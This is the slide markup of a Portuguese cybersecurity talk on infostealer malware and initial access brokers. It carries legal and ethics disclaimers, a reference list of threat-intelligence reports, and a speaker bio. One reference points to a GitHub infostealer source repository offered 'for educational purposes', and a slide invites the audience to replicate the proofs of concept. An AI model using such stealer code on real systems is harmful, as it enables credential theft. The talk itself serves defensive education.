                <a:ea typeface="Gotham HTF Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Gotham HTF Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="5400" kern="0" spc="150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Gotham HTF Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gotham HTF Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Gotham HTF Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="5400" kern="0" spc="150" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="ED145B">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Gotham HTF Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gotham HTF Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Gotham HTF Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Intelligence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="5400" kern="0" spc="150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Gotham HTF Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gotham HTF Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Gotham HTF Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="5400" kern="0" spc="150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Gotham HTF Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gotham HTF Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Gotham HTF Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>LEGAL: O acesso não autorizado a sistemas informáticos é crime (Lei 12.737/12 - "Lei Carolina Dieckmann"). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="5400" kern="0" spc="150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Gotham HTF Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gotham HTF Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Gotham HTF Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>ÉTICA: Conhecimento é uma ferramenta. A escolha de como usá-la define o profissional que você é.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29144236"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advTm="231671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67233" y="3568700"/>
            <a:ext cx="19852581" cy="684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400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="63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O CIBERCRIME NÃO PRECISA MAIS QUEBRAR A SUA PORTA; ELE ESTÁ COMPRANDO A CHAVE DE UM FUNCIONÁRIO SEU POR MENOS DE 10 DÓLARES. A PERGUNTA NÃO É SE VOCÊ TEM UM FIREWALL, MAS O QUÃO RÁPIDO VOCÊ CONSEGUE DETECTAR UMA CHAVE ROUBADA.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6300" dirty="0"/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6534A7-263E-BFD6-E0AF-9E6424702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5ECF8546-BF8C-2435-3934-BB09748AE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57309ED-62F7-A65D-FF9C-5939AB88082C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905239" y="710163"/>
            <a:ext cx="21404218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REFERÊNCIAS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3336409-90C8-1FC2-6D7D-26E2C74F0360}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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8E7F06F6-042C-D24B-E1A8-D6669247E22A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057637" y="2694603"/>
            <a:ext cx="20424299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3600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Relatórios Institucionais e Governamentais</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fórum de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSIRTs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2025 (CERT.br): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1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Kryptus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6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Análise de Ameaças Contemporâneas</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Centro Nacional de Cibersegurança (CNCS): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="28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Alerta sobre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1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Infostealers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6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 Roubo de Dados Sensíveis</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inteligência de Ameaças (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IABs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp; Ecossistema de Logs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sekoia.io: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C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Panorama do Ecossistema de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0563C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Infostealers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C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Língua Russa</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RBR Verona: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1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Initial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="28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Access Broker: O Elo entre Invasão e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A2B6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Ransomware</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Leaders: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C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Megavazamento: 16 bilhões de credenciais expostas por </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A2B6C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Infostealers</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Análises Técnicas de Malwares Específicos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft Security: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0563C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Lumma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C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800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0563C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Stealer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C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Quebrando as Técnicas de Entrega e Capacidades</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flashpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C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Desvendando o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0563C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Seidr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C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800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0563C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Infostealer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C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Malware</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>McAfee </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C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ascensão do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0563C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Lumma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C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via canais de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A2B6C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Telegram</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CloudSEK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C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Investigação da Infraestrutura do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0563C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Bandit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C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800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A2B6C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Stealer</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bridewell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0563C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Easy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C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800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0563C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Stealer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C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Análise Técnica de Capacidades</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mídia Especializada e Acadêmica</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forbes Tech: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C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Como se proteger dos espiões digitais por trás dos vazamentos de Gmail</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ScienceDirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C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Análise Científica sobre Vetores de Exfiltração de Dados</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Repositórios e Ferramentas (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GitHub: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0563C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Empyrean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C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800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0563C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Stealer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C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Exemplo de código e estrutura (Fins Educacionais)</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6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072728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C9DCAB-EFF4-2514-D24F-08C58AF0C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BF4AD919-35D5-E3CD-2F0C-8D8D4B958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8D2DD84-D5FC-2BD2-9D18-53DB936E8150}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905239" y="710163"/>
            <a:ext cx="21404218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REPLIQUE AS POCS E ME SIGA!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53CAE76-249C-E615-603D-AEF717E7B4B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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CD0D3F73-9E98-592A-C009-8452861671B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057637" y="2694603"/>
            <a:ext cx="20424299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indent="-685800" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagem 6" descr="Código QR&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79B12449-A65C-70BC-F6EC-B5FC2FA3E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482" y="3521529"/>
            <a:ext cx="6806444" cy="8800520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagem 8" descr="Código QR&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF4E25BB-D86B-F1A2-C778-128F97B89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3249" y="3519570"/>
            <a:ext cx="6806444" cy="880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016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8B8CAE-4B12-6150-3566-C490579A5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E32A088B-5A7E-1E2C-D8AC-C448AA731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068F9C6-1167-BD72-3612-1599DC002B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1544986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8000" b="1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#whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8000" b="1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6EFEEBF-FE48-F253-321E-FC5F2533490C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="3731862"/>
            <a:ext cx="18398174" cy="175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buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="54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Licenciado </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1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em</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1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Computação</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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 – UFGD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1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Especialista</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1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em</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1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Engenharia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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 de Software, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1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Segurança</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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 de Redes de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1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Computadores</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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 e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1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Cibersecurity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
              <a:latin typeface="Gotham HTF Book" pitchFamily="34" charset="0"/>
              <a:ea typeface="Gotham HTF Book" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="54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Guerreiro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1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Cibernético</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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 n° 373 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1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Exército</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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 Brasileiro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="54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Professor da Pós Tech FIAP – Cybersecurity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="54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Assessor de TI – Banco do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1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Brasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1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Unidade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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 de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1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Segurança</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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 Digital e da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1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Informação</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
              <a:latin typeface="Gotham HTF Book" pitchFamily="34" charset="0"/>
              <a:ea typeface="Gotham HTF Book" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1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Colecionador</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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 de Discos de Vinil</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill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27829C7-3C29-79D2-1B8E-60E1D6D0D6FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="21153805" y="133256"/>
